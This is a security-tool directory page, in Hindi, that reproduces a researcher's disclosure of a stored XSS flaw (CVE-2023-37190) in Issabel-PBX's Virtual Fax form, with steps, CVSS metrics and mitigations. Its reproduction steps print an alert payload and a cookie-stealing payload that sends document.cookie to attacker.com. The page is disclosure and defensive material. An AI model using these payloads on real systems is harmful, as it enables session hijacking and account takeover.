Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-37190 — संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता Issabel-PBX संस्करण 4.0.0-6 में मौजूद है। एप्लिकेशन उपयोगकर्ता-आपूर्ति किए गए इनपुट को डेटाबेस में संग्रहीत करने और बाद में वेब इंटरफ़ेस में प्रस्तुत करने से पहले ठीक से सैनिटाइज़ और एन्कोड करने में विफल रहता है। | Kitploit
उपकरण/GitHubGitHub/sahiloj/cve-2023-37190
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता Issabel-PBX संस्करण 4.0.0-6 में मौजूद है। एप्लिकेशन उपयोगकर्ता-आपूर्ति किए गए इनपुट को डेटाबेस में संग्रहीत करने और बाद में वेब इंटरफ़ेस में प्रस्तुत करने से पहले ठीक से सैनिटाइज़ और एन्कोड करने में विफल रहता है।

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-37190 — Issabel-PBX 4.0.0-6: संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)

CVE Severity Type Affected Version


📋 अवलोकन

फ़ील्डविवरण
CVE IDCVE-2023-37190
कमज़ोरीसंग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
प्रभावित उत्पादIssabel-PBX
प्रभावित संस्करण4.0.0-6
गंभीरतामध्यम (CVSS v3.1 स्कोर: 5.4)
खोजकर्ताSahil Ojha
प्रकटीकरण तिथि07 जुलाई 2023
विक्रेताIssabel
स्रोत कोडIssabelFoundation/issabelPBX
परीक्षण प्लेटफ़ॉर्मWindows

📝 विवरण

Issabel-PBX संस्करण 4.0.0-6 में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) कमज़ोरी मौजूद है। एप्लिकेशन डेटाबेस में संग्रहीत करने और बाद में वेब इंटरफ़ेस में प्रस्तुत करने से पहले उपयोगकर्ता द्वारा प्रदत्त इनपुट को ठीक से सैनिटाइज़ और एन्कोड करने में विफल रहता है।

यह कमज़ोरी Virtual Fax मॉड्यूल में मौजूद है, विशेष रूप से "New Virtual Fax" निर्माण फ़ॉर्म में। दो इनपुट पैरामीटर — Virtual Fax Name और Caller ID Name — पर्याप्त इनपुट सत्यापन या आउटपुट एन्कोडिंग से नहीं गुजरते हैं। यह एक निम्न-विशेषाधिकार प्राप्त प्रमाणित हमलावर को एप्लिकेशन के भीतर एक दुर्भावनापूर्ण JavaScript पेलोड इंजेक्ट करने और स्थायी रूप से संग्रहीत करने की अनुमति देता है।

एक बार संग्रहीत हो जाने पर, दुर्भावनापूर्ण स्क्रिप्ट स्वचालित रूप से किसी भी उपयोगकर्ता (प्रशासकों सहित) के ब्राउज़र में निष्पादित हो जाती है जो प्रभावित पृष्ठ पर जाता है, हमलावर की ओर से किसी अतिरिक्त सहभागिता की आवश्यकता नहीं होती।


⚠️ प्रभाव

इस कमज़ोरी का सफलतापूर्वक शोषण करने वाला हमलावर निम्न कार्य कर सकता है:

  • सत्र कुकीज़ चुरा सकता है और प्रमाणित उपयोगकर्ता सत्रों का अपहरण कर सकता है, जिसमें प्रशासक खाते भी शामिल हैं।
  • पीड़ितों की ओर से कार्य कर सकता है, जैसे कॉन्फ़िगरेशन बदलना, उपयोगकर्ता जोड़ना या सिस्टम सेटिंग्स संशोधित करना।
  • उपयोगकर्ताओं को हमलावर-नियंत्रित फ़िशिंग या मैलवेयर-वितरण पृष्ठों पर पुनर्निर्देशित कर सकता है।
  • एप्लिकेशन इंटरफ़ेस को विकृत कर सकता है, जिससे उपयोगकर्ता अनुभव और विश्वास प्रभावित होता है।
  • प्रभावित पृष्ठ तक पहुँचने वाले सभी उपयोगकर्ताओं को मैलवेयर या ब्राउज़र शोषण वितरित कर सकता है।
  • कीलॉगिंग कर सकता है या पृष्ठ पर दर्ज की गई संवेदनशील जानकारी कैप्चर कर सकता है।

चूंकि पेलोड संग्रहीत (स्थायी) होता है, यह हटाए जाने तक प्रभावित पृष्ठ पर जाने वाले हर उपयोगकर्ता को प्रभावित करता है — जिससे यह रिफ्लेक्टेड XSS से अधिक गंभीर हो जाता है।


🔢 CVSS v3.1 स्कोर


🔍 कमज़ोरी विवरण

  • कमज़ोरी प्रकार: संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (CWE-79)
  • प्रभावित घटक: Virtual Fax मॉड्यूल → New Virtual Fax फ़ॉर्म
  • कमज़ोर पैरामीटर:
    • Virtual Fax Name
    • Caller ID Name
  • प्रमाणीकरण आवश्यक: हाँ (निम्न-विशेषाधिकार प्राप्त प्रमाणित उपयोगकर्ता)
  • मूल कारण: डेटाबेस में संग्रहीत करने और वेब UI में प्रस्तुत करने से पहले प्रभावित पैरामीटरों पर इनपुट सैनिटाइज़ेशन और आउटपुट एन्कोडिंग की कमी।

🛠️ पुनरुत्पादन के चरण

पूर्वापेक्षाएँ

  • Issabel-PBX संस्करण 4.0.0-6 का एक चालू इंस्टेंस।
  • Fax मॉड्यूल तक पहुँच वाले खाते के लिए मान्य क्रेडेंशियल्स (मानक उपयोगकर्ता या प्रशासक)।

पुनरुत्पादन चरण

चरण 1: मान्य क्रेडेंशियल्स का उपयोग करके Issabel-PBX वेब एप्लिकेशन में लॉग इन करें।

चरण 2: Fax → Virtual Fax → New Virtual Fax पर नेविगेट करें।

Virtual Fax Name और/या Caller ID Name फ़ील्ड में निम्नलिखित XSS पेलोड इंजेक्ट करें:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

सत्र कुकी चोरी प्रदर्शित करने वाले अधिक प्रभावशाली proof-of-concept के लिए (ध्यान दें: वास्तविक हमलों में, चुराई गई कुकीज़ को ट्रांज़िट में उजागर होने से बचाने के लिए HTTPS का उपयोग किया जाता है):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

इंजेक्ट किए गए पेलोड के साथ भरा गया फ़ॉर्म नीचे दिए गए स्क्रीनशॉट के समान दिखना चाहिए:

चरण 2 - Virtual Fax Name और Caller ID Name फ़ील्ड में XSS पेलोड इंजेक्ट करना

चरण 3: फ़ॉर्म सबमिट करने के लिए Save बटन पर क्लिक करें। पेलोड अब एप्लिकेशन डेटाबेस में स्थायी रूप से संग्रहीत हो जाता है।

चरण 4: Virtual Fax सूची पृष्ठ पर नेविगेट करें (या किसी अन्य उपयोगकर्ता — जैसे प्रशासक — को पृष्ठ पर जाने दें)। संग्रहीत स्क्रिप्ट आगंतुक के ब्राउज़र में स्वचालित रूप से निष्पादित होगी, जैसा कि नीचे दिखाया गया है:

चरण 4 - ब्राउज़र में संग्रहीत XSS पेलोड निष्पादित हो रहा है


🩹 शमन और सुधार

Issabel-PBX उपयोगकर्ताओं और प्रशासकों को निम्नलिखित उपाय अपनाने की दृढ़ता से सलाह दी जाती है:

  1. इनपुट सत्यापन: सभी उपयोगकर्ता-प्रदत्त इनपुट पर सख्त सर्वर-साइड सत्यापन लागू करें। HTML विशेष वर्णों (<, >, ", ', &) वाले इनपुट को अस्वीकार या सैनिटाइज़ करें।
  2. आउटपुट एन्कोडिंग: स्क्रिप्ट निष्पादन को रोकने के लिए वेब इंटरफ़ेस में उपयोगकर्ता-प्रदत्त डेटा प्रस्तुत करते समय संदर्भ-जागरूक आउटपुट एन्कोडिंग (HTML एंटिटी एन्कोडिंग) लागू करें।
  3. सामग्री सुरक्षा नीति (CSP): स्क्रिप्ट निष्पादित किए जा सकने वाले स्रोतों को सीमित करने के लिए एक सख्त Content-Security-Policy HTTP हेडर लागू करें, जिससे XSS कमज़ोरियों का प्रभाव कम हो।
  4. अपग्रेड / पैच: आधिकारिक Issabel रिपॉज़िटरी की निगरानी करें और विक्रेता द्वारा जारी किए गए किसी भी सुरक्षा पैच को लागू करें।
  5. न्यूनतम विशेषाधिकार: Virtual Fax जैसे संवेदनशील मॉड्यूल तक पहुँच केवल उन्हीं उपयोगकर्ताओं तक सीमित रखें जिन्हें इसकी आवश्यकता है, जिससे हमले की सतह सीमित हो।

📚 संदर्भ

  • NVD - CVE-2023-37190
  • MITRE CVE प्रविष्टि
  • Issabel आधिकारिक वेबसाइट
  • GitHub पर IssabelFoundation/issabelPBX
  • CWE-79: वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन ('क्रॉस-साइट स्क्रिप्टिंग')
  • OWASP: क्रॉस-साइट स्क्रिप्टिंग (XSS)

👤 लेखक

Sahil Ojha
सुरक्षा शोधकर्ता
GitHub: @sahiloj


अस्वीकरण: यह रिपॉज़िटरी केवल शैक्षिक और जिम्मेदार प्रकटीकरण उद्देश्यों के लिए है। यहाँ दी गई जानकारी का उपयोग सिस्टम स्वामी की स्पष्ट लिखित अनुमति के बिना सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें
मेट्रिकमान
आधार स्कोर5.4 (मध्यम)
हमला वेक्टरनेटवर्क
हमला जटिलतानिम्न
आवश्यक विशेषाधिकारनिम्न
उपयोगकर्ता सहभागिताआवश्यक
दायरापरिवर्तित
गोपनीयतानिम्न
अखंडतानिम्न
उपलब्धताकोई नहीं